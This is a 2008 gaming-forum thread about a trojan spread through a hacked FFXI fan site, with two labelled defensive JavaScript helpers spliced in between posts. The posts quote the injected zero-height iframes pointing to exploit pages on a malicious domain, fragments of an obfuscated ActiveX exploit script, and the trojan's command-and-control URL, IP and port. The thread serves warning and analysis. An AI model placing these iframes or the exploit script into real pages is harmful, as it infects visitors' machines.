Windower: New trojan Information: taizi.exe / FFXIAtlas infected - Windower


New trojan Information: taizi.exe / FFXIAtlas infected

#1 Aikar

  • delete world; world = new Planet("Code");
  • Group: +Windower Developers
  • Posts: 3,809
  • Joined: 19-April 05
  • Gender:Male
  • Location:Raleigh, NC
  • Interests:PHP, FFXI, C++
  • Name: Aikar, Aikari
  • Server: Leviathan
  • Jobs: WHM75 BLM75
  • Race: Tarutaru Male
  • Linkshell: Eternia

Posted 26 August 2008 - 05:00 AM

Was alerted that FFXI-Atlas was hacked again, so please do not visit FFXI Atlas w/o protection.

It appears to be an IE-only exploit, although I was told the exploit crashed Firefox, so please take precautions and follow the guides.

The file is named taizi.exe located on the domain usa.ccxtt.com

It is saved to C:\explorer.exe and is executed from there.

There are actually multiple exploitation methods.

The site is infected with a malicious iframe, which contains... more iframes!

THESE ARE VIRUSES. DON'T GO TO THESE LINKS
<iframe src=http://usa.ccxtt.com/0614.HTML width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/mdb.HTML width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/B_ICE.HTML width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/ffff.html width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/flash.htm width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/ifff.html width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/re10.htm width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/re11.htm width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/Yahoo1.html width=100 height=0></iframe>

<script src=Ajax.gif></script>
<script language="javascript" src="http://count8.51yes.com/click.aspx?id=84422514&logo=1"></script>


Each one is trying a different exploit vector.

One of them is referencing a clsid:
var LiYmexx='MicroSoft.pif';
var LiYme='MicroSoft.vbs';
var chilam=document["createElement"]("object");
var CID="clsid:";
var CIDs="0-983A-0";
var CIDss="0C04";
var CIDsss="FC29E36";
var CIDx="BD96C";
var CIDxx="556-65A3-11D";
var LBExml="Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P";
var LBEado="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";


But Google returns nothing on that ID, so I have no clue what software it's trying to exploit.

Please use Firefox with NoScript and Adblock and protect yourself as described in these links:
http://forums.window...showtopic=11323
http://forums.window...showtopic=13208

If anyone wants to run it in a virtual machine to diagnose its actions better, please post. I'm just viewing the source code.
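The post above shows two things a defender would want to check mechanically: the zero-height iframes and disguised script tag injected into the page, and the CLSID that the exploit script splits across several string variables so that a plain text search finds nothing. The following is an added triage helper, not code from the thread or from Windower. The HTML sample is constructed with placeholder hosts rather than the live URLs quoted above; the fragment order used to reassemble the CLSID is an assumption, since the post quotes only the variable declarations and not the line that concatenates them. In that order the fragments reassemble to BD96C556-65A3-11D0-983A-00C04FC29E36, which is the CLSID of the MDAC RDS.DataSpace ActiveX control addressed by MS06-014, and the two other split strings resolve to Microsoft.XMLHTTP and Adodb.Stream, the usual companions of that control in drive-by download pages.

```javascript
// Added example (not from the thread): static triage of a suspected drive-by page.
// (1) list hidden iframes and disguised <script src> targets in the page HTML;
// (2) reassemble a CLSID split across string fragments and check whether it
//     names a known-vulnerable control so the box can be patched/blocked.

// Constructed sample, placeholder hosts only (not the live URLs from the thread).
const SAMPLE_HTML = `
<p>legit page content</p>
<iframe src=http://example.invalid/a.HTML width=100 height=0></iframe>
<iframe src="http://example.invalid/b.htm" width=100 height=0></iframe>
<iframe src="http://example.invalid/player.html" width=300 height=200></iframe>
<script src=Ajax.gif></script>
<script language="javascript" src="http://stats.example.invalid/click.aspx?id=1&logo=1"></script>
`;

// Fragments as declared in the quoted script; the concatenation ORDER is assumed.
const CLSID_FRAGMENTS = ["clsid:", "BD96C", "556-65A3-11D", "0-983A-0", "0C04", "FC29E36"];
const XMLHTTP_FRAGMENTS = ["Microsoft.X", "M", "L", "H", "T", "T", "P"];
const ADODB_FRAGMENTS = ["A", "d", "o", "d", "b.", "S", "t", "r", "e", "a", "m"];

// Known-vulnerable control: MDAC RDS.DataSpace, patched by MS06-014.
const KNOWN_VULNERABLE_CLSIDS = {
  "BD96C556-65A3-11D0-983A-00C04FC29E36": "RDS.DataSpace (MDAC, MS06-014)",
};

const IFRAME_RE = /<iframe\b[^>]*\bsrc=["']?([^\s"'>]+)[^>]*>/gi;
const SCRIPT_RE = /<script\b[^>]*\bsrc=["']?([^\s"'>]+)[^>]*>/gi;

// Iframes with width or height 0 load a page the user never sees: the
// classic drive-by pattern. Returns their src attributes.
function findHiddenIframes(html) {
  const hidden = [];
  for (const m of html.matchAll(IFRAME_RE)) {
    const tag = m[0];
    const h = /\bheight=["']?(\d+)/i.exec(tag);
    const w = /\bwidth=["']?(\d+)/i.exec(tag);
    if ((h && h[1] === "0") || (w && w[1] === "0")) hidden.push(m[1]);
  }
  return hidden;
}

// <script src=...> targets; a script served under an image/document extension
// (e.g. Ajax.gif) is flagged, since that is a common disguise for injected JS.
function findScriptSources(html) {
  return [...html.matchAll(SCRIPT_RE)].map((m) => ({
    src: m[1],
    suspicious: /\.(gif|jpe?g|png|bmp|txt|html?)(\?|$)/i.test(m[1]),
  }));
}

// Joins string fragments the way the obfuscated script would at runtime.
function joinFragments(parts) {
  return parts.join("");
}

// Reassembles the CLSID, validates the GUID shape (8-4-4-4-12 hex groups)
// and looks it up against the known-vulnerable list.
function assembleClsid(parts) {
  const clsid = joinFragments(parts);
  const guid = clsid.replace(/^clsid:/i, "").toUpperCase();
  const wellFormed =
    /^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}$/.test(guid);
  return {
    clsid,
    guid,
    wellFormed,
    knownVulnerable: KNOWN_VULNERABLE_CLSIDS[guid] || null,
  };
}

// Stand-alone run over the constructed sample.
console.log("hidden iframes:", findHiddenIframes(SAMPLE_HTML));
console.log("scripts:", findScriptSources(SAMPLE_HTML));
console.log("clsid:", assembleClsid(CLSID_FRAGMENTS));
console.log("objects:", joinFragments(XMLHTTP_FRAGMENTS), joinFragments(ADODB_FRAGMENTS));
```

Run it with `node` against a saved copy of the page source (never a live fetch from the infected host) by replacing `SAMPLE_HTML`; the output tells you which frames to block at the proxy and, via the CLSID lookup, which patch or kill bit to verify on the clients that visited the site.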

#2 Kuuhalee

  • Rookie
  • Group: Members
  • Posts: 10
  • Joined: 12-July 08
  • Name: Kuuhalee
  • Server: Odin
  • Race: Mithra
  • Linkshell: LimitBreak

Posted 26 August 2008 - 08:29 AM

Just infected myself in a VM ... attempting to locate files that it installed.

#3 Kuuhalee

  • Rookie
  • Group: Members
  • Posts: 10
  • Joined: 12-July 08
  • Name: Kuuhalee
  • Server: Odin
  • Race: Mithra
  • Linkshell: LimitBreak

Posted 26 August 2008 - 08:59 AM

Installs Service :
VSSC - (c:\windows\system32\thtpni.dll)
TCPIP - (c:\windows\system32\tcpip.sys)
[random generated character string] - (c:\windows\system32\drivers\thtpni.sys)

Connects to Website (every 30 seconds) :
http://www.crackwg.net/pcshare/pc.txt
- [Contents of File = "59.34.148.248:7866"]

Also Attempts to Connect (Undetermined Amount of Time) :
http://59.34.148.248...3853/753874.jsp (may be randomly generated)



That's all the information that I've gleaned so far. Attempting to do an in-depth analysis of anything else that might have been changed. Also trying to copy over the POL Viewer for more testing.

#4 Kuuhalee

  • Rookie
  • Group: Members
  • Posts: 10
  • Joined: 12-July 08
  • Name: Kuuhalee
  • Server: Odin
  • Race: Mithra
  • Linkshell: LimitBreak

Posted 26 August 2008 - 09:32 AM

Connection to 59.34.148.248:7866 seems persistent and does not terminate unless connection is lost to the host. If connection to the host is lost, the trojan will attempt to connect to crackwg.net every 30 seconds and attempt to connect to the specified host in the pc.txt file. Once connected to the specified host, it will cease attempting to connect to crackwg.net. The path to the JSP and the JSP file itself IS randomly generated. I am guessing that it is generated based on date and current time.



Initial Data Received from 59.34.148.248**.JSP :

Send: Return Code: 0x00000000
00000000  52 0D 12 12 8A 1A 12 12 12 D2 E5 19 F6 16 12 12	R...............
00000010  A7 13 12 12 12 12 12 12 10 12 12 12 13 12 12 12	................
00000020  56 21 13 12 53 7B B9 14 8D 51 2F 58 A2 A5 F3 93	V!..S{...Q/X....
00000030  68 B7 D6 11 12 12 12 12 12 12 12 12 12 12 12 12	h...............
00000040  12 12 12 12 12 12 12 12 46 5B 55 57 40 59 24 12	........F[UW@Y$.
00000050  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000060  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000070  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000080  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000090  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000000A0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000000B0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000000C0  12 12 12 12 12 12 12 12 46 5B 55 57 40 59 24 12	........F[UW@Y$.
000000D0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000000E0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000000F0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000100  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000110  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000120  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000130  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000140  12 12 12 12 12 12 12 12 D4 C7 DF BA AD DF A9 B5	................
00000150  C5 FB 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000160  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000170  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000180  12 12 12 12 12 12 12 12 A9 F3 C6 A3 A2 F4 A3 AC	................
00000190  49 20 22 22 25 23 23 20 27 4F 12 12 12 12 12 12	I ""%## 'O......
000001A0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000001B0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000001C0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................


Subsequent Data Received :

Receive: Return Code: 0x00000000
00000000  48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D	HTTP/1.1 200 OK.
00000010  0A 44 61 74 65 3A 20 54 20 47 4D 54 0D 0A 43 6F	.Date: T GMT..Co
00000020  6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 38 0D	ntent-Length: 8.
00000030  0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65	.Connection: Kee
00000040  70 2D 41 6C 69 76 65 0D 0A 43 61 63 68 65 2D 43	p-Alive..Cache-C
00000050  6F 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65	ontrol: no-cache
00000060  0D 0A 0D 0A 4D 1F 00 00 00 00 00 00				....M.......

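The behaviour Kuuhalee describes in posts #3 and #4 (a fixed URL polled every 30 seconds whose body is an "ip:port" rendezvous address, followed by a persistent connection to that address) is exactly the kind of thing that stands out in proxy logs if you look for it. The following detection logic is an added example, not code from the thread or from Windower. The log lines are constructed for the example in an assumed `<epoch seconds> <client ip> <url> <bytes>` layout, and the jitter and hit-count thresholds are assumptions to tune against your own traffic; the pc.txt URL and the `59.34.148.248:7866` body are the values quoted in the thread.

```javascript
// Added example (not from the thread): spot periodic polling of a fixed URL in
// proxy logs, and parse the "ip:port" rendezvous body the trojan fetches from it.

// Constructed sample log, assumed layout: "<epoch seconds> <client ip> <url> <bytes>".
// Client 10.0.0.5 polls pc.txt every ~30 s (the thread's observed interval) and
// also browses normally; client 10.0.0.7 only makes a few irregular requests.
const SAMPLE_PROXY_LOG = [
  "1219737600 10.0.0.5 http://www.crackwg.net/pcshare/pc.txt 18",
  "1219737605 10.0.0.5 http://www.example.invalid/news 5120",
  "1219737610 10.0.0.5 http://www.example.invalid/news 5130",
  "1219737630 10.0.0.5 http://www.crackwg.net/pcshare/pc.txt 18",
  "1219737660 10.0.0.5 http://www.crackwg.net/pcshare/pc.txt 18",
  "1219737661 10.0.0.7 http://www.example.invalid/index.html 8000",
  "1219737680 10.0.0.5 http://www.example.invalid/news 5110",
  "1219737690 10.0.0.5 http://www.crackwg.net/pcshare/pc.txt 18",
  "1219737694 10.0.0.5 http://www.example.invalid/news 5125",
  "1219737700 10.0.0.7 http://www.example.invalid/index.html 8000",
  "1219737721 10.0.0.5 http://www.crackwg.net/pcshare/pc.txt 18",
  "1219737790 10.0.0.7 http://www.example.invalid/index.html 8000",
];

function parseLogLine(line) {
  const [ts, client, url, bytes] = line.trim().split(/\s+/);
  return { ts: Number(ts), client, url, bytes: Number(bytes) };
}

// Groups requests by (client, url), measures the gaps between hits and flags
// pairs whose gaps are regular (max deviation from the mean <= maxJitterSec)
// with at least minHits requests. Browsing is bursty; beacons are metronomic.
function findBeacons(lines, { minHits = 4, maxJitterSec = 2 } = {}) {
  const groups = new Map();
  for (const rec of lines.map(parseLogLine)) {
    const key = `${rec.client} ${rec.url}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(rec.ts);
  }
  const beacons = [];
  for (const [key, times] of groups) {
    if (times.length < minHits) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => t - times[i]);
    const mean = gaps.reduce((a, b) => a + b, 0) / gaps.length;
    const jitter = Math.max(...gaps.map((g) => Math.abs(g - mean)));
    if (jitter <= maxJitterSec) {
      const [client, url] = key.split(" ");
      beacons.push({ client, url, hits: times.length, periodSec: Math.round(mean) });
    }
  }
  return beacons;
}

// Parses a rendezvous body such as "59.34.148.248:7866" into host and port,
// rejecting anything that is not a dotted-quad IPv4 with a valid port, so the
// result can be fed straight into a firewall block list or a watchlist.
function parseRendezvous(body) {
  const m = /^\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\s*$/.exec(body);
  if (!m) return null;
  const host = m[1];
  if (host.split(".").some((o) => Number(o) > 255)) return null;
  const port = Number(m[2]);
  if (port < 1 || port > 65535) return null;
  return { host, port };
}

// Stand-alone run over the constructed sample.
console.log("beacons:", findBeacons(SAMPLE_PROXY_LOG));
console.log("rendezvous:", parseRendezvous("59.34.148.248:7866"));
```

The jitter check is deliberately strict because the thread reports a fixed 30-second retry; real implants often add randomness, so in production you would widen `maxJitterSec` or use a relative measure, and you would also correlate the flagged client with outbound connections to the parsed host:port, since post #4 notes the polling stops once that connection succeeds.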

#5 souleman

  • Hacked the Gibson
  • Group: +Power Members
  • Posts: 1,639
  • Joined: 29-August 07
  • Gender:Male
  • Location:Michigan
  • Name: Souleman
  • Server: Phoenix
  • Jobs: RDM
  • Race: Elvaan Male
  • Linkshell: TheUsualSuspects

Posted 26 August 2008 - 07:08 PM

taizi seems like an odd name.. That's a legit executable file for a Chinese program. (Pinyin Star 2000)

The 2nd section Aikar posted (CLSID section), looks like a portion of Trojan-Downloader.JS.Confusion.a that uses javascript. Confusion.a (through .h or so), were variants of Win32/TrojanDownloader.Small.NZK.

Guessing this is the same type thing.
